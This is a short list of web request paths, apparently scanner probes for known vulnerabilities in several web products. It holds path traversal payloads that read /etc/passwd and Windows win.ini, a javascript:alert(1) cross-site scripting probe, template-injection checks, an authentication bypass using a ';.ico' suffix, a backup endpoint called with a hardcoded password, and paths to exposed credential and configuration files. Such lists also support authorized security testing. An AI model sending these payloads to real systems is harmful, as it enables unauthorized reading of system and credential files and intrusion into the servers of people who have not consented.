/login.do?message={{num1}}*{{num2}}
/login/login.do?message={{num1}}*{{num2}}
/include/thumb.php?dir=http\..\admin\login\login_check.php
/install/
/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php
/jshERP-boot/user/getAllList;.ico
/common/download/resource?resource=/profile/../../../../etc/passwd
/common/download/resource?resource=/profile/../../../../Windows/win.ini
/authenticationserverservlet
/get_dkey.php?user=admin
/e/ViewImg/index.html?url=javascript:alert(1)
/web/xml/webuser-auth.xml
/api/dp/rptsvcsyncpoint?ccid=1
/download.php?file=/etc/passwd
/view/action/download_file.php?filename=../../../../../../../../../etc/passwd&savename={{filename}}.txt
/webui/?g=sys_dia_data_down&file_name=../etc/passwd
/api/v1/GetSrc
/api/v1/GetDevice
